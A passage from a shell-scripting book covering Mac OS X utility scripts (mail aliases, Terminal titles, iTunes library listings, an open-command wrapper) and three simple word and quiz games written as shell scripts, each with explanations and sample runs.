  echo -n "Alias to create: "
  read alias
else
  alias=$1
fi

# Now let's check to see if that alias already exists...

if $showaliases | grep "${alias}:" > /dev/null 2>&1 ; then
  echo "$0: mail alias $alias already exists" >&2
  exit 1
fi

# Looks good. Let's get the RHS and inject it into NetInfo

echo -n "pointing to: "
read rhs    # the right-hand side of the alias

niutil -create     . /aliases/$alias
niutil -createprop . /aliases/$alias name $alias
niutil -createprop . /aliases/$alias members "$rhs"

echo "Alias $alias created without incident."
exit 0

How It Works
If you've studied Script #94, Adding a User to a Mac OS X System, you should immediately see all the similarities
between that script and this one, including the test for the root user and the invocations of niutil with the flags
-create and -createprop.
The most interesting snippet in this script is the test to see if the alias already exists:

if $showaliases | grep "${alias}:" > /dev/null 2>&1 ; then
  echo "$0: mail alias $alias already exists" >&2
  exit 1
fi
It's a good example of how to properly use the result of a command as a test while discarding any output, either to
stdout or stderr. The notation > /dev/null discards stdout, of course, and then the odd notation 2>&1
causes output device #2, stderr, to be mapped to output device #1, stdout, also effectively routing stderr to
/dev/null.
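The same pattern works anywhere a command's exit status is more interesting than its output. A small self-contained sketch, using grep as the test command (the sample alias data and address are made up):

```shell
#!/bin/sh
# Use a command itself as the if condition, silencing both output streams.
# grep exits 0 on a match and nonzero otherwise, so no output is needed.

aliases="gareth: gareth@example.com
postmaster: taylor"

if echo "$aliases" | grep "gareth:" > /dev/null 2>&1 ; then
  echo "alias gareth already exists"
fi
```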

Running the Script


This script is fairly flexible: You can specify the alias you'd like to create on the command line, or it'll prompt for the
alias if you've forgotten. Otherwise, it prompts for needed fields and has no command flags.

The Results
$ sudo addmacalias
Alias to create: gareth
pointing to: gareth@hotmail.com
Alias gareth created without incident.

Hacking the Script


It would be quite easy to add an -l flag or something similar to addmacalias to produce a listing of all current
mail aliases, and that would significantly improve the utility of this simple script.

#96 Set the Terminal Title Dynamically


This is a fun little script for Mac OS X users who like to work in the Terminal application. Instead of having to use the
Terminal > Window Settings > Window dialog box to set or change the window title, you can use this script to change it
whenever you like.

The Code
#!/bin/sh
# titleterm - Tells the Mac OS X Terminal application to change its title
#   to the value specified as an argument to this succinct script.

if [ $# -eq 0 ] ; then
  echo "Usage: $0 title" >&2
  exit 1
else
  echo -ne "\033]0;$1\007"
fi

exit 0

How It Works
The Terminal application understands a variety of secret escape codes, and the titleterm script
sends the sequence ESC ] 0 ; title BEL, which changes the window title to the specified value.

Running the Script


To change the title of the Terminal window, simply type in the new title you desire.

The Results
There's no apparent output from the command:
$ titleterm $(pwd)
However, it instantly changes the title of the Terminal window to the present working directory.

Hacking the Script


With one small addition to your .cshrc or .bashrc (depending on what login shell you have), you can
automatically have the Terminal window title always show the current working directory. To use this to show your
current working directory, for example, you can use either of the following:
alias precmd 'titleterm "$PWD"'                  [tcsh]
export PROMPT_COMMAND="titleterm \"\$PWD\""      [bash]

If you run either the tcsh shell (the default login shell for 10.2.x) or the bash shell (the default shell for 10.3.x, the
so-called Panther release of Mac OS X), you can drop one of the commands above into your .cshrc or .bashrc,
and, starting the next time you open up a Terminal window, you'll find that your window title changes each time you
move into a new directory!

#97 Producing Summary Listings of iTunes Libraries


If you've used the excellent Mac OS X application iTunes for any length of time, you're sure to have a massive playlist
of CDs that you've scanned, downloaded, swapped, or what-have-you. Unfortunately, for all its wonderful capabilities,
iTunes doesn't have an easy way to export a list of your music in a succinct and easy-to-read format. Fortunately, it's
not hard to write a script to offer this functionality.

The Code
#!/bin/sh
# itunelist - Lists your iTunes library in a succinct and attractive
#   manner, suitable for sharing with others, or for
#   synchronizing (with diff) iTunes libraries on different
#   computers and laptops.

itunehome="$HOME/Music/iTunes"
ituneconfig="$itunehome/iTunes Music Library.xml"

musiclib="/$(grep '>Music Folder<' "$ituneconfig" | cut -d/ -f5- | \
  cut -d\< -f1 | sed 's/%20/ /g')"

echo "Your music library is at $musiclib"

if [ ! -d "$musiclib" ] ; then
  echo "$0: Confused: Music library $musiclib isn't a directory?" >&2
  exit 1
fi

exec find "$musiclib" -type d -mindepth 2 -maxdepth 2 \! -name '.*' -print | \
  sed "s|$musiclib/||"

How It Works
Like many modern computer applications, iTunes expects its music library to be in a standard location, in this case
~/Music/iTunes Music Library/iTunes Library/, but allows you to move it elsewhere if desired.
The script needs to be able to ascertain the different location, and that's done by extracting the Music Folder field
value from the iTunes preferences file. That's what this pipe accomplishes:

musiclib="/$(grep '>Music Folder<' "$ituneconfig" | cut -d/ -f5- | \
  cut -d\< -f1 | sed 's/%20/ /g')"

The preferences file ($ituneconfig) is an XML data file, so it's necessary to do some chopping to identify the
exact Music Folder field value. Here's what the Music Folder value in my own iTunes config file looks like:

file://localhost/Volumes/110GB/iTunes%20Library/

The Music Folder value is actually stored as a fully qualified URL, interestingly enough, so we need to chop off
the file://localhost/ prefix, which is the job of the first cut command. Finally, because many directories in
Mac OS X include spaces, and because the Music Folder field is saved as a URL, all spaces in that field are
mapped to %20 sequences and have to be restored to spaces by the sed invocation before proceeding.
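To see the chopping in isolation, here's the same pipeline run against a single hypothetical Music Folder line, the shape such a line takes in the XML file:

```shell
# A hypothetical Music Folder line as it might appear in the XML file:
line='<key>Music Folder</key><string>file://localhost/Volumes/110GB/iTunes%20Library/</string>'

# Fields 5 and beyond of the /-delimited line skip past the XML key and the
# file://localhost prefix; the cut at '<' drops the closing tag, and sed
# restores the %20-encoded spaces:
musiclib="/$(echo "$line" | cut -d/ -f5- | cut -d\< -f1 | sed 's/%20/ /g')"

echo "$musiclib"   # -> /Volumes/110GB/iTunes Library/
```

Note that the leading slash has to be glued back on by hand, since it was consumed as a field delimiter.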
With the Music Folder name determined, it's now easy to generate music lists on two Macintosh systems (or even an
iPod!) and then use the diff command to compare them, making it a breeze to see which albums are unique to one
or the other system and perhaps to sync them up.
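As a sketch of that comparison, here are two tiny hypothetical listing files standing in for the output of the script on two machines:

```shell
# Two hypothetical listings, as ituneslist might have produced them:
cat > /tmp/mac1-music.txt <<'EOF'
Acoustic Alchemy/Blue Chip
Alan Parsons Project/Eve
EOF
cat > /tmp/mac2-music.txt <<'EOF'
Acoustic Alchemy/Blue Chip
Al Jarreau/Heaven And Earth
EOF

# Lines marked '<' exist only in the first library, '>' only in the second.
# diff exits nonzero when the files differ, so ignore its status here:
diff /tmp/mac1-music.txt /tmp/mac2-music.txt || true
```

In this run, Alan Parsons Project/Eve shows up with a `<` (only on the first Mac) and Al Jarreau/Heaven And Earth with a `>` (only on the second).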

Running the Script


There are no command arguments or flags to this script.

The Results
$ ituneslist | head
Your music library is at /Volumes/110GB/iTunes Library/
Acoustic Alchemy/Blue Chip
Acoustic Alchemy/Red Dust & Spanish Lace
Acoustic Alchemy/Reference Point
Adrian Legg/Mrs. Crowe's Blue Waltz
Al Jarreau/Heaven And Earth
Alan Parsons Project/Best Of The Alan Parsons Project
Alan Parsons Project/Eve
Alan Parsons Project/Eye In The Sky
Alan Parsons Project/I Robot

Hacking the Script


All right, this isn't about hacking the script per se, but because the iTunes library directory is saved as a fully qualified
URL, it would be most interesting to experiment with having a web-accessible iTunes directory and then using the URL
of that directory as the Music Folder value in the XML file....

#98 Fixing the Open Command


As I discussed earlier, one neat innovation with Mac OS X is the addition of the open command, which allows you to
easily launch the appropriate Aqua application for just about any type of file, whether it's a graphics image, a PDF
document, or even an Excel spreadsheet. The problem with open is that it's a bit quirky in its behavior: if you
want to have it launch a named application, for example, you have to include the -a flag. Pickier still, if you don't
specify the exact application name, it will complain and fail. A perfect job for a wrapper script.

The Code
#!/bin/sh

# open2 - A smart wrapper for the cool Mac OS X 'open' command
#    to make it even more useful. By default, open launches the
#    appropriate application for a specified file or directory
#    based on the Aqua bindings, and has a limited ability to
#    launch applications if they're in the /Applications dir.

# First off, whatever argument we're given, try it directly:

open="/usr/bin/open"

if ! $open "$@" >/dev/null 2>&1 ; then
  if ! $open -a "$@" >/dev/null 2>&1 ; then

    # More than one arg? Don't know how to deal with it: quit

    if [ $# -gt 1 ] ; then
      echo "open: Can't figure out how to open or launch $@" >&2
      exit 1
    else
      case $(echo $1 | tr '[:upper:]' '[:lower:]') in
        acrobat      ) app="Acrobat Reader"         ;;
        adress*      ) app="Address Book"           ;;
        chat         ) app="iChat"                  ;;
        cpu          ) app="Activity Monitor"       ;;
        dvd          ) app="DVD Player"             ;;
        excel        ) app="Microsoft Excel"        ;;
        netinfo      ) app="NetInfo Manager"        ;;
        prefs        ) app="System Preferences"     ;;
        print        ) app="Printer Setup Utility"  ;;
        profil*      ) app="System Profiler"        ;;
        qt|quicktime ) app="QuickTime Player"       ;;
        sync         ) app="iSync"                  ;;
        word         ) app="Microsoft Word"         ;;
        * ) echo "open: Don't know what to do with $1" >&2
            exit 1
      esac
      echo "You asked for $1 but I think you mean $app." >&2
      $open -a "$app"
    fi
  fi
fi

exit 0

How It Works
This script revolves around the open program having a zero return code upon success and a nonzero return code
upon failure.
i f ! $ o pen " $@" > /dev /nul l 2>& 1 ; t h en
i f ! $op en -a " $@" >/de v/nul l 2> & 1 ; t h en
If the supplied argument is not a filename, the first conditional fails, and the script tests to see if the supplied argument
is a valid application name by adding -a. If the second conditional fails, the script uses a ca se statement to test for

common nicknames that people use to refer to popular applications:


c as e $ ( ech o $1 | tr ' [:up per:] ' '[ : l owe r : ]' ) in
And it even offers a friendly message when it matches a nickname, just before launching the named application:
$ o pen 2 ex ce l
Y ou as k ed fo r e xc el b ut I thin k yo u mea n Mi cr os o ft E x ce l .
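The normalize-then-match pattern can be isolated into a tiny function of its own; this sketch uses just two of the script's nickname entries:

```shell
# Sketch of the nickname lookup: lowercase the argument, then match it
# against known shorthand names (only two entries shown here).
nickname_to_app() {
    case $(echo "$1" | tr '[:upper:]' '[:lower:]') in
        qt|quicktime ) echo "QuickTime Player" ;;
        word         ) echo "Microsoft Word"   ;;
        *            ) echo "unknown"          ;;
    esac
}

nickname_to_app QuickTime   # -> QuickTime Player
nickname_to_app WORD        # -> Microsoft Word
```

Lowercasing first means users can type the nickname in any capitalization and still hit the same case branch.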

Running the Script


The open2 script expects one or more filenames or application names to be specified on the command line.

The Result
Without this wrapper, an attempt to open the application Microsoft Word fails:

$ open "Microsoft Word"
2003-09-20 21:58:37.769 open[25733] No such file:
/Users/taylor/Desktop//Microsoft Word

Rather a scary error message, actually, though it occurred only because the user did not supply the -a flag. The same
invocation with the open2 script shows that it is no longer necessary to remember the -a flag:

$ open2 "Microsoft Word"
$

No output is good: The application launched and was ready to use. To make this script maximally useful, I've included
a series of nicknames for common Panther (Mac OS X 10.3) applications, so while open -a word definitely won't
work, open2 word works just fine.

Hacking the Script


This script could be considerably more useful if the nickname list were tailored to your specific needs or the needs of
your user community. That should be easily accomplished!

Chapter 12: Shell Script Fun and Games


Overview
Up to this point, we've been pretty focused on serious and important uses of shell scripts to improve your interaction
with your Unix/Linux system and make the system more flexible and powerful. But there's another side to shell scripts
that's worth exploring just briefly as the book wraps up, and that's games.
Don't worry, I'm not proposing that we write a new version of The Sims as a shell script. It just turns out that there
are a number of simple games that are easily and informatively written as shell scripts, and, heck, wouldn't you rather
learn how to debug shell scripts by working with something fun than with some serious utility for suspending user
accounts or analyzing Apache error logs?
Here are two quick examples up front to show you what I mean. First off, long-time Usenet readers know about
something called rot13, a simple mechanism whereby off-color jokes and obscene text are obscured to make them a
bit less easily read. It's what's called a substitution cipher, and it turns out to be remarkably simple to accomplish in
Unix.
To rot13 something, simply feed it through tr:

tr '[a-zA-Z]' '[n-za-mN-ZA-M]'

Here's an example:

$ echo "So two people walk into a bar..." | tr '[a-zA-Z]' '[n-za-mN-ZA-M]'
Fb gjb crbcyr jnyx vagb n one...

To unwrap it, simply apply the same transform:

$ echo 'Fb gjb crbcyr jnyx vagb n one...' | tr '[a-zA-Z]' '[n-za-mN-ZA-M]'
So two people walk into a bar...
Another short example is a palindrome checker. Type in something you believe is a palindrome, and it'll test it to see:

testit="$(echo $@ | sed 's/[^[:alpha:]]//g' | tr '[:upper:]' '[:lower:]')"
backwards="$(echo $testit | rev)"

if [ "$testit" = "$backwards" ] ; then
  echo "$@ is a palindrome"
else
  echo "$@ is not a palindrome"
fi
The logic here: A palindrome is a word that's identical forward or backward, so the first step is to remove all
nonalphabetic characters and then ensure that everything is lowercase. Then the Unix utility rev reverses the letters in
a line of input. If the forward and backward versions are the same, we've got a palindrome, and if they differ, we don't.
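To watch each stage of that pipeline work on a classic palindrome:

```shell
phrase="A man, a plan, a canal: Panama"

# Stage 1: strip everything that isn't a letter
stripped=$(echo "$phrase" | sed 's/[^[:alpha:]]//g')
echo "$stripped"   # -> AmanaplanacanalPanama

# Stage 2: fold to lowercase
lowered=$(echo "$stripped" | tr '[:upper:]' '[:lower:]')
echo "$lowered"    # -> amanaplanacanalpanama

# Stage 3: reverse with rev; for a palindrome the output is unchanged
echo "$lowered" | rev
```

Since the reversed string matches the cleaned-up original, the phrase passes the palindrome test.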
The three short games presented in this final chapter are only a bit more complex, but all will prove fun and worth
adding to your system, I'm sure. All three require separate data files, however, which you can most easily obtain from
my website. For the word list, load and save the file at
http://www.intuitive.com/wicked/examples/long-words.txt, and for the state capitals data file
download http://www.intuitive.com/wicked/examples/state.capitals.txt.
Save both of the files in the directory /usr/lib/games/ for the scripts to work as written, or, if you save them
elsewhere, modify the scripts to match.

#99 Unscramble: A Word Game


If you've seen the Jumble game in your newspaper or played word games at all, you're familiar with the basic concept
of this game: A word is picked at random and then scrambled. Your task is to figure out and guess what the original
word is in the minimum number of turns.

The Code
#!/bin/sh

# unscramble - Picks a word, scrambles it, and asks the user to guess
#    what the original word (or phrase) was.

wordlib="/usr/lib/games/long-words.txt"
randomquote="$HOME/bin/randomquote"     # Script #76

scrambleword()
{
  # Pick a word randomly from the wordlib, and scramble it.
  # Original word is $match and scrambled word is $scrambled

  match="$($randomquote $wordlib)"

  echo "Picked out a word!"

  len=$(echo $match | wc -c | sed 's/[^[:digit:]]//g')
  scrambled=""; lastval=1

  for (( val=1; $val < $len ; ))
  do
    if [ $(perl -e "print int rand(2)") -eq 1 ] ; then
      scrambled=$scrambled$(echo $match | cut -c$val)
    else
      scrambled=$(echo $match | cut -c$val)$scrambled
    fi
    val=$(( $val + 1 ))
  done
}

if [ ! -r $wordlib ] ; then
  echo "$0: Missing word library $wordlib" >&2
  echo "(online: http://www.intuitive.com/wicked/examples/long-words.txt" >&2
  echo "save the file as $wordlib and you're ready to play!)" >&2
  exit 1
fi

newgame=""; guesses=0; correct=0; total=0

until [ "$guess" = "quit" ] ; do

  scrambleword

  echo ""
  echo "You need to unscramble: $scrambled"

  guess="??" ; guesses=0
  total=$(( $total + 1 ))

  while [ "$guess" != "$match" -a "$guess" != "quit" -a "$guess" != "next" ]
  do
    echo ""
    echo -n "Your guess (quit|next) : "
    read guess

    if [ "$guess" = "$match" ] ; then
      guesses=$(( $guesses + 1 ))
      echo ""
      echo "*** You got it with tries = ${guesses}! Well done!! ***"
      echo ""
      correct=$(( $correct + 1 ))
    elif [ "$guess" = "next" -o "$guess" = "quit" ] ; then
      echo "The unscrambled word was \"$match\". Your tries: $guesses"
    else
      echo "Nope. That's not the unscrambled word. Try again."
      guesses=$(( $guesses + 1 ))
    fi
  done
done

echo "Done. You correctly figured out $correct out of $total scrambled words."

exit 0

How It Works
To randomly pick a single line from a file, this script uses Script #76, Displaying Random Text, even though it was
originally written to work with web pages. Like many good Unix utilities, it turns out to be a useful building block in
other contexts than the one it was intended for:
match="$($randomquote $wordlib)"
The toughest part of this script was figuring out how to scramble a word. There's no handy Unix utility for that, but
fortunately it turns out that if we assemble the scrambled word by going letter by letter through the correctly spelled
word and randomly adding each subsequent letter to the scrambled sequence at either the beginning or the end of the
sequence, we quite effectively scramble the word differently and unpredictably each time:
if [ $(perl -e "print int rand(2)") -eq 1 ] ; then
  scrambled=$scrambled$(echo $match | cut -c$val)
else
  scrambled=$(echo $match | cut -c$val)$scrambled
fi

Notice where $scrambled is located in the two lines: In the first line the added letter is appended, while in the
second it is prepended.
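The same loop can be pulled out into a standalone sketch; this version substitutes the shell's $RANDOM for the script's perl call, so the coin flip stays but the dependency goes:

```shell
# Standalone sketch of the scramble loop, using $RANDOM in place of perl.
scramble() {
    word="$1"; scrambled=""; val=1
    len=$(echo "$word" | wc -c | sed 's/[^[:digit:]]//g')
    while [ $val -lt $len ] ; do
        letter=$(echo "$word" | cut -c$val)
        if [ $(( RANDOM % 2 )) -eq 1 ] ; then
            scrambled="$scrambled$letter"    # append the letter
        else
            scrambled="$letter$scrambled"    # prepend the letter
        fi
        val=$(( val + 1 ))
    done
    echo "$scrambled"
}

scramble hello   # a different permutation on (almost) every run
```

Whatever the sequence of coin flips, the result is always a permutation of the original word, which is exactly what the game needs.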
Otherwise the main game logic should be easily understood: The outer while loop runs until the user enters quit
as a guess, while the inner loop runs until the user either guesses the word or types next to skip to the next word.

Running the Script


This script has no arguments or parameters, so just type in the name, and you're ready to play!

The Results
$ unscramble
Picked out a word!

You need to unscramble: ninrenoccg

Your guess (quit|next) : concerning

*** You got it with tries = 1! Well done!! ***

Picked out a word!

You need to unscramble: esivrmipod

Your guess (quit|next) : quit
The unscrambled word was "improvised". Your tries: 0
Done. You correctly figured out 1 out of 2 scrambled words.

Clearly an inspired guess on that first one!

Hacking the Script


Perhaps some method of offering a clue would make this game more interesting or, alternatively, a flag that requests
the minimum word length that is acceptable. To accomplish the former, perhaps the first n letters of the unscrambled
word could be shown for a certain penalty in the scoring; each clue requested would show one additional letter. For the
latter, you'd need to have an expanded word dictionary, as the one included with the script has a minimum word length
of ten letters, which makes it rather tricky!
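The clue idea might look something like this sketch (give_hint and its penalty bookkeeping are hypothetical, not part of the script):

```shell
# A hypothetical hint helper: reveal the first N letters of the answer.
# The caller would bump a penalty counter each time it's invoked.
give_hint() {
    hintlen="$1"; match="$2"
    echo "Hint: the word starts with \"$(echo "$match" | cut -c1-$hintlen)\""
}

give_hint 3 concerning   # -> Hint: the word starts with "con"
```

Each additional request would simply call give_hint with a larger first argument.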

#100 Guess the Word Before It's Too Late: Hangman


A classic word game with a macabre metaphor, hangman is nonetheless popular and enjoyable. In the game, you
guess letters that might be in the hidden word, and each time you guess incorrectly, the man hanging on the gallows
has an additional body part drawn in. Make too many wrong guesses, and the man is fully illustrated, so not only do
you lose, but, well, you presumably die too. Not very pleasant!
However, the game itself is fun, and writing it as a shell script proves surprisingly easy.

The Code
#!/bin/sh

# hangman - A rudimentary version of the hangman game. Instead of showing a
#    gradually embodied hanging man, this simply has a bad guess countdown.
#    You can optionally indicate the initial distance from the gallows as the only
#    arg.

wordlib="/usr/lib/games/long-words.txt"
randomquote="$HOME/bin/randomquote.sh"     # Script #76
empty="\."     # we need something for the sed [set] when $guessed=""
games=0

if [ ! -r $wordlib ] ; then
  echo "$0: Missing word library $wordlib" >&2
  echo "(online: http://www.intuitive.com/wicked/examples/long-words.txt" >&2
  echo "save the file as $wordlib and you're ready to play!)" >&2
  exit 1
fi

while [ "$guess" != "quit" ] ; do

  match="$($randomquote $wordlib)"    # pick a new word from the library

  if [ $games -gt 0 ] ; then
    echo ""
    echo "*** New Game! ***"
  fi

  games="$(( $games + 1 ))"
  guessed="" ; guess="" ; bad=${1:-6}
  partial="$(echo $match | sed "s/[^$empty${guessed}]/-/g")"

  while [ "$guess" != "$match" -a "$guess" != "quit" ] ; do

    echo ""
    if [ ! -z "$guessed" ] ; then
      echo -n "guessed: $guessed, "
    fi
    echo "steps from gallows: $bad, word so far: $partial"
    echo -n "Guess a letter: "
    read guess
    echo ""

    if [ "$guess" = "$match" ] ; then
      echo "You got it!"
    elif [ "$guess" = "quit" ] ; then
      sleep 0    # a 'noop' to avoid an error message on 'quit'
    elif [ $(echo $guess | wc -c | sed 's/[^[:digit:]]//g') -ne 2 ] ; then
      echo "Uh oh: You can only guess a single letter at a time"
    elif [ ! -z "$(echo $guess | sed 's/[[:lower:]]//g')" ] ; then
      echo "Uh oh: Please only use lowercase letters for your guesses"
    elif [ -z "$(echo $guess | sed "s/[$empty$guessed]//g")" ] ; then
      echo "Uh oh: You have already tried $guess"
    elif [ "$(echo $match | sed "s/$guess/-/g")" != "$match" ] ; then
      guessed="$guessed$guess"
      partial="$(echo $match | sed "s/[^$empty${guessed}]/-/g")"
      if [ "$partial" = "$match" ] ; then
        echo "** You've been pardoned!! Well done! The word was \"$match\"."
        guess="$match"
      else
        echo "* Great! The letter \"$guess\" appears in the word!"
      fi
    elif [ $bad -eq 1 ] ; then
      echo "** Uh oh: you've run out of steps. You're on the platform... <SNAP!>"
      echo "** The word you were trying to guess was \"$match\""
      guess="$match"
    else
      echo "* Nope, \"$guess\" does not appear in the word."
      guessed="$guessed$guess"
      bad=$(( $bad - 1 ))
    fi
  done
done
exit 0

How It Works
The tests in this script are all interesting and worth examination. Consider this test to see if the player has entered
more than a single letter as his or her guess:

elif [ $(echo $guess | wc -c | sed 's/[^[:digit:]]//g') -ne 2 ] ; then

Why test for the value 2 rather than 1? Because the entered value has a carriage return appended by the read
statement, and so it has two letters if it's correct, not one. The sed in this statement strips out all nondigit values, of
course, to avoid any confusion with the leading whitespace that wc likes to emit.
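You can confirm the off-by-one-newline behavior directly at the command line:

```shell
# A one-letter guess still counts as two characters, because the echo
# feeding wc adds a trailing newline; sed strips wc's leading padding.
count=$(echo "e" | wc -c | sed 's/[^[:digit:]]//g')
echo "$count"   # -> 2
```

So a correct single-letter guess always yields 2, and anything longer (or empty) fails the -ne 2 test.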
Testing for lowercase is straightforward: Remove all lowercase letters from guess and see if the result is zero (empty)
or not:

elif [ ! -z "$(echo $guess | sed 's/[[:lower:]]//g')" ] ; then

And, finally, to see if the user has guessed the letter already, transform the guess such that any letters in guess that
also appear in the guessed variable are removed, and see if the result is zero (empty) or not:

elif [ -z "$(echo $guess | sed "s/[$empty$guessed]//g")" ] ; then
Apart from all these tests, however, the trick behind getting hangman to work is to translate into dashes all
occurrences in the original word of each guessed letter and then to compare the result to the original word. If they're
different, the guessed letter is in that word:

elif [ "$(echo $match | sed "s/$guess/-/g")" != "$match" ] ; then

One of the key ideas that made it possible to write hangman was that the partially filled-in word shown to the player,
the variable partial, is rebuilt each time a correct guess is made. Because the variable guessed accumulates
each letter guessed by the player, a sed transformation that translates into a dash each letter in the original word that
is not in the guessed string does the trick:

partial="$(echo $match | sed "s/[^$empty${guessed}]/-/g")"
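Here's that masking transform in isolation, using a word from the sample game below and a hypothetical set of guessed letters:

```shell
# Standalone sketch of the masking transform: any letter not in the
# guessed set (or the $empty placeholder) becomes a dash.
empty="\."
match="sententiously"
guessed="ent"

partial="$(echo $match | sed "s/[^$empty${guessed}]/-/g")"
echo "$partial"   # -> -entent------
```

The $empty placeholder keeps the sed bracket expression from being empty (and thus invalid) before the first correct guess.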

Running the Script


The hangman game has one optional argument: If you specify a numeric value as a parameter, it will use that as the
number of incorrect guesses allowed, rather than the default of 6.
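That optional argument works through the `${1:-6}` parameter expansion, which can be seen in a two-line experiment:

```shell
# The ${1:-6} idiom used by the script: take the first positional
# argument if present, else fall back to the default of 6.
set --          # simulate running 'hangman' with no arguments
bad=${1:-6}
echo "$bad"     # -> 6

set -- 3        # simulate running 'hangman 3'
bad=${1:-6}
echo "$bad"     # -> 3
```

A smaller number makes for a much less forgiving game.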

The Results
$ hangman
steps from gallows: 6, word so far: -------------
Guess a letter: e

* Great! The letter "e" appears in the word!

guessed: e, steps from gallows: 6, word so far: -e--e--------
Guess a letter: i

* Great! The letter "i" appears in the word!

guessed: ei, steps from gallows: 6, word so far: -e--e--i-----
Guess a letter: o

* Great! The letter "o" appears in the word!

guessed: eio, steps from gallows: 6, word so far: -e--e--io----
Guess a letter: u

* Great! The letter "u" appears in the word!

guessed: eiou, steps from gallows: 6, word so far: -e--e--iou---
Guess a letter: m

* Nope, "m" does not appear in the word.

guessed: eioum, steps from gallows: 5, word so far: -e--e--iou---
Guess a letter: n

* Great! The letter "n" appears in the word!

guessed: eioumn, steps from gallows: 5, word so far: -en-en-iou---
Guess a letter: r

* Nope, "r" does not appear in the word.

guessed: eioumnr, steps from gallows: 4, word so far: -en-en-iou---
Guess a letter: s

* Great! The letter "s" appears in the word!

guessed: eioumnrs, steps from gallows: 4, word so far: sen-en-ious--
Guess a letter: t

* Great! The letter "t" appears in the word!

guessed: eioumnrst, steps from gallows: 4, word so far: sententious--
Guess a letter: l

* Great! The letter "l" appears in the word!

guessed: eioumnrstl, steps from gallows: 4, word so far: sententiousl-
Guess a letter: y

** You've been pardoned!! Well done! The word was "sententiously".

*** New Game! ***

steps from gallows: 6, word so far: ---------
Guess a letter: quit

Hacking the Script


Obviously it's quite difficult to have the fancy guy-hanging-on-the-gallows graphic if we're working with a shell script, so
we use the alternative of counting "steps to the gallows" instead. If you were motivated, however, you could probably
have a series of predefined "text" graphics, one for each step, and output them as the game proceeds. Or you could
choose a nonviolent alternative of some sort, of course!
Note that it is possible to pick the same word twice, but with the default word list containing 2,882 different words,
there's not much chance of that occurring. If this is a concern, however, the line where the word is chosen could also
save all previous words in a variable and screen against them to ensure that there aren't any repeats.
Finally, if you were motivated, it'd be nice to have the guessed letters list be sorted alphabetically. There are a couple
of approaches to this, but I think I'd try to use sed|sort.

#101 A State Capitals Quiz


Once you have a tool for choosing a line randomly from a file, as we have with Script #76, Displaying Random Text,
there's no limit to the type of quiz games you can write. In this instance, I've pulled together a list of the capitals of all
50 states in the United States of America; this script randomly chooses one, shows the state, and asks the user to type
in the matching capital.

The Code
#!/bin/sh

# states - A state capital guessing game. Requires the state capitals
#    data file at http://www.intuitive.com/wicked/examples/state.capitals.txt.

db="/usr/lib/games/state.capitals.txt"
randomquote="$HOME/bin/randomquote.sh"     # Script #76

if [ ! -r $db ] ; then
  echo "$0: Can't open $db for reading." >&2
  echo "(get http://www.intuitive.com/wicked/examples/state.capitals.txt" >&2
  echo "save the file as $db and you're ready to play!)" >&2
  exit 1
fi

guesses=0; correct=0; total=0

while [ "$guess" != "quit" ] ; do
  thiskey="$($randomquote $db)"

  state="$(echo $thiskey | cut -d\  -f1 | sed 's/-/ /g')"
  city="$(echo $thiskey | cut -d\  -f2 | sed 's/-/ /g')"
  match="$(echo $city | tr '[:upper:]' '[:lower:]')"

  guess="??" ; total=$(( $total + 1 )) ;

  echo ""
  echo "What city is the capital of $state?"

  while [ "$guess" != "$match" -a "$guess" != "next" -a "$guess" != "quit" ]
  do
    echo -n "Answer: "
    read guess
    if [ "$guess" = "$match" -o "$guess" = "$city" ] ; then
      echo ""
      echo "*** Absolutely correct! Well done! ***"
      correct=$(( $correct + 1 ))
      guess=$match
    elif [ "$guess" = "next" -o "$guess" = "quit" ] ; then
      echo ""
      echo "$city is the capital of $state."
    else
      echo "I'm afraid that's not correct."
    fi
  done
done

echo "You got $correct out of $total presented."
exit 0

How It Works
For such an entertaining game, sta tes is very simple scripting. The data file contains state/capital pairs, with all
spaces in the state and capital names replaced with dashes and the two fields separated by a single space. As a
result, extracting the city and state names from the data is easy:
s t a t e= "$ (ec h o $t h iske y | c ut - d \
-f1 | sed 's/-/ /g')"
c i t y= "$ (ec h o $t h iske y | c ut - d \
-f2 | sed 's/-/ /g')"
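Run against one hypothetical data-file line, the extraction looks like this (a space delimiter is written as -d' ' here for readability):

```shell
# Extracting the pair from one hypothetical data-file line:
thiskey="West-Virginia Charleston"

state="$(echo $thiskey | cut -d' ' -f1 | sed 's/-/ /g')"
city="$(echo $thiskey | cut -d' ' -f2 | sed 's/-/ /g')"

echo "$state / $city"   # -> West Virginia / Charleston
```

The dash-for-space convention is what lets a simple space-delimited cut work even for multiword state names.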
Each guess is compared against both the all-lowercase version of the city name (match) and the actual correctly
capitalized city name to see if it's correct. If not, the guess is compared against the two command words next and
quit. If either matches, the script shows the answer and either prompts for another state or quits, as appropriate.
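A quick sketch of that two-way comparison (with a hypothetical answer) shows one subtlety: only the exact capitalized name or the all-lowercase form matches, not other capitalizations.

```shell
# Sketch of the two-way comparison from the inner loop:
city="Juneau"
match="$(echo $city | tr '[:upper:]' '[:lower:]')"

for guess in juneau Juneau JUNEAU ; do
    if [ "$guess" = "$match" -o "$guess" = "$city" ] ; then
        echo "$guess: correct"
    else
        echo "$guess: not recognized"
    fi
done
```

Here "juneau" and "Juneau" are accepted, but "JUNEAU" is not; a fully case-insensitive match would need the guess lowercased too.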

Running the Script


This script has no arguments or command flags.

The Results
Ready to quiz yourself on state capitals?
$ states

What city is the capital of Indiana?
Answer: Bloomington
I'm afraid that's not correct.
Answer: Indianapolis

*** Absolutely correct! Well done! ***

What city is the capital of Massachusetts?
Answer: Boston

*** Absolutely correct! Well done! ***

What city is the capital of West Virginia?
Answer: Charleston

*** Absolutely correct! Well done! ***

What city is the capital of Alaska?
Answer: Fairbanks
I'm afraid that's not correct.
Answer: Anchorage
I'm afraid that's not correct.
Answer: Nome
I'm afraid that's not correct.
Answer: Juneau

*** Absolutely correct! Well done! ***

What city is the capital of Oregon?
Answer: quit

Salem is the capital of Oregon.
You got 4 out of 5 presented.
Fortunately, the game tracks only ultimately correct guesses, not how many incorrect guesses you made or whether
you popped over to Google to get the correct answer! :-)

Hacking the Script


Probably the greatest weakness in this game is that it's so picky about spelling. A useful modification would be to add
some code to allow fuzzy matching, so that the user entry of Juneu might match Juneau, for example. This could be
done using a modified Soundex algorithm, in which all vowels are removed and all doubled letters are squished down
to a single letter (e.g., Annapolis would transform to npls). This might be too forgiving for your tastes, but the general
concept is worth considering.
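That suggested transform (not true Soundex, just the vowel-drop-and-squash variant described above) can be sketched in a few lines:

```shell
# A rough sketch of the suggested fuzzy-match key: lowercase, drop
# vowels, then collapse runs of repeated letters to one.
squash() {
    echo "$1" | tr '[:upper:]' '[:lower:]' | sed 's/[aeiou]//g' \
        | sed 's/\(.\)\1*/\1/g'
}

squash Annapolis   # -> npls
squash Juneau      # -> jn
```

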